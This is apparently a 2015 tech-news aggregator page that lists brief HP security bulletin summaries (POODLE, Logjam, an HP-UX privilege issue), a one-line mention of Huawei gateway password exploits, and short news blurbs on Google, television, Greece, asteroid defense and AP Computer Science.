HP Security Bulletin HPSBPI03360 2 – A potential security vulnerability has been identified with certain HP LaserJet Printers & MFPs, certain HP OfficeJet Printers & MFPs, & certain HP JetDirect Networking cards using OpenSSL. This is the SSLv3 vulnerability known as “Padding Oracle on Downgraded Legacy Encryption” or “POODLE”, which could be exploited remotely to[…]

HP Security Bulletin HPSBPI03107 1

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

HP Security Bulletin HPSBPI03107 1 – A potential security vulnerability has been identified with certain HP LaserJet Printers & MFPs, certain HP OfficeJet Printers & MFPs, & certain HP JetDirect Networking cards using OpenSSL. This is the SSLv3 vulnerability known as “Padding Oracle on Downgraded Legacy Encryption” or “POODLE”, which could be exploited remotely to[…]

HP Security Bulletin HPSBGN03362 1

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

HP Security Bulletin HPSBGN03362 1 – A potential security vulnerability has been identified with HP Discovery & Dependency Mapping Inventory (DDMI). This is the TLS vulnerability in U.S. export-grade 512-bit keys in Diffie-Hellman key exchange known as “Logjam” which could be exploited remotely resulting in disclosure of information. Revision 1 of this advisory. View Source

HP Security Bulletin HPSBMU03267 3

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

HP Security Bulletin HPSBMU03267 3 – Potential security vulnerabilities have been identified with the HP Matrix Operating Environment & HP CloudSystem Matrix running OpenSSL. These vulnerabilities comprise the SSLv3 vulnerability known as “Padding Oracle on Downgraded Legacy Encryption” or “POODLE”, which could be exploited remotely to allow disclosure of information. Revision 3 of this advisory.[…]

HP Security Bulletin HPSBUX03359 1

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

HP Security Bulletin HPSBUX03359 1 – A potential security vulnerability has been identified with the HP-UX pppoec utility. The vulnerability could be exploited in allowing a local user to elevate their privilege. Revision 1 of this advisory. View Source

HP Security Bulletin HPSBGN03351 1

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

HP Security Bulletin HPSBGN03351 1 – Potential security vulnerabilities have been identified with HP IceWall SSO Dfw, SSO Certd, MCRP, & Federation Agent running OpenSSL. This is the TLS vulnerability known as “Logjam”, which could be exploited remotely to allow disclosure of information. Revision 1 of this advisory. View Source

New Study Accuses Google of Anti-competitive Search Behavior

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

An anonymous reader writes: Columbia Law School professor Tim Wu — the man who coined the term “network neutrality” — has published a new study suggesting that Google’s new method of putting answers to simple search queries at the top of the results page is anticompetitive & harmful to consumers. For subjective search queries —[…]

How Television Is Fighting Off the Internet

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

HughPickens.com writes: Michael Wolff writes in the NY Times that online-media revolutionaries once figured they could eat TV’s lunch by stealing TV’s business model with free content supported by advertising. But online media is now drowning in free, & internet traffic has glutted the ad market, forcing down rates. Digital publishers, from The Guardian to[…]

Greek Financial Crisis Is an Opportunity For Bitcoin

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

An anonymous reader writes: Greece’s economy has been in trouble for several years, now, & a major vote next weekend will shake it up even further. The country can’t pay its debts, & the upcoming referendum will decide whether they face increased austerity measures or start the process of exiting the Euro. One side effect[…]

The Underfunded, Disorganized Plan To Save Earth From the Next Giant Asteroid

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

New submitter citadrianne sends a story approximately the beginnings of our asteroid defense efforts, & how initial concern over an asteroid strike wasn’t sustained long enough to establish consistent funding: Until a few decades ago, the powers that be didn’t take the threat of asteroids very seriously. This changed on March 23, 1989, when an[…]

Huawei Home Gateway HG530 / HG520b Password Disclosure / Change

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

Two exploits for Huawei Home Gateway versions HG530 & HG520b that allow for password disclosure & password change. View Source

AP CS Test Takers and Pass Rates Up, Half of Kids Don’t Get Sparse Arrays At All

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

theodp writes: Each June, the College Board tweets out teasers of the fuller breakouts of its Advanced Placement (AP) test results, which aren’t made available until the fall. So, here’s a roundup of this year’s AP Computer Science tweetstorm: 1. “Wow — massive gains in AP Computer Science participation (25% growth) AND scores this year;[…]

Tags
Last referers
Online Now
Welcome , today is Wednesday, July 1, 2015